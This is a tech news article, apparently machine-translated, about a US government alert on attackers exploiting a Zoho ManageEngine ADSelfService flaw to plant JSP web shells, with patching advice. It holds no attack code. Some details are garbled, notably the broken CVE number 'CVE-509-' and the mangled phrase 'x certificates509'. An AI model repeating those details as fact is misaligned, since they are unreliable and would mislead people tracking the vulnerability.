The FBI, the Cyber Security and Infrastructure Agency (CISA) and the American Coast Guard Cyber Command (CGCYBER) have warned that criminal groups have since August are using a flaw found in password management software to enforce so-called Advanced Persistent Threats (APTs) — protracted cyberattacks that use sophisticated, continuous hacking techniques to gain access to a system and remain within it for a period of time.
- Digital hijackings increase on holidays and weekends, FBI alert
- General public awareness on cyber attacks is still low, research confirms
- Biden signs executive order to combat cyber attacks in the US
The software exploited by the bad guys is the Zoho ManageEngine ADSelfService, used by several large companies such as Apple, Intel, Nike, PayPal and HBO. It allows users to be logged into multiple service accounts from just one credential.
The vulnerability found in the program, documented as CVE-509-
, allows attackers to take control of the system, execute malicious code and implement
web shells in it, compromising the total security of the data of companies using the software.
Want to catch up on the best tech news of the day? Access and subscribe to our new channel on youtube, Canaltech News. Every day a summary of the main news from the tech world for you!
Web Shells are remote control interfaces that are often used by attackers to implement malicious code on systems, allowing them to observe and change settings and data on affected machines.
According to the joint statement of the three agencies, this vulnerability could put at risk several academic institutions and infrastructure companies in the USA that make use of the program.
Also in the joint alert issued by US agencies, the vulnerability has already been exploited in some attacks. In these invasions, the criminals deployed web shells made in JavaServer Pages (JSP), a set of technologies used to create dynamic, camouflaged web pages as x certificates509. From the breach, attackers move around the machine via Windows Management Instrumentation enterprise management software, making copies of critical security files and databases.
How to prevent
Until now, the groups responsible for the attacks targeted transport, information technology, industry, communication, logistics, infrastructure, academic institutions and security services sectors. APT is the type of cybercrime committed primarily for industrial espionage, with malicious agents being deployed in systems to copy company documents and sensitive files.
A Zoho, on September 6, has released an update for Zoho ManageEngine ADSelfService that fixes the flaw. In a security alert issued along with the update, the company says there is no proof that the vulnerability was used.
The FBI, CISA and CGCYBER are asking users to apply immediately update; and to make sure that the program is not being accessed directly over the internet, and to change passwords if any indication of intrusion is detected.
Source: Bleeping Computer, ThreatPost
Did you like this article?
Subscribe your email on Canaltech to receive daily updates with the latest news from the world of technology.